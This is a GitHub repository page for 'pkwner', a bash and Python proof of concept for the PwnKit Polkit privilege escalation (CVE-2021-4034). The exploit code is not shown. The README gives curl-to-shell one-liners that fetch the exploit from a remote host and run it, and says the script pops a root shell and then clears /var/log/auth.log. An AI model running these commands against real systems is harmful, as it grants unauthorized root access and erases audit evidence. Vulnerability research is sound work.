Skip to content
/ pkwner Public

A python3 and bash PoC for CVE-2021-4034 by Kim Schulz

Notifications You must be signed in to change notification settings

kimusan/pkwner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz

Intro

This is a simple PoC for the newly found Polkit error names PwnKit.

I made it both as bash and python3 script - just for the fun of it.

The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access.

How to run

This scripts are a one shot execution so simply do

python3 pkwner.py

or

bash pkwner.sh

You can also run it directly from a webserver (e.g. this github repo) via:

python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

or

source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

In both cases it should look something like this: alt text and alt text

The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not).

Credits

  • Qualys for finding the issue and making the info public
  • Andris Raugulis for making one of the first PoCs to get inspired from
  • MiscGang because misgang@Kalmarunionen are baddass

About

A python3 and bash PoC for CVE-2021-4034 by Kim Schulz

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published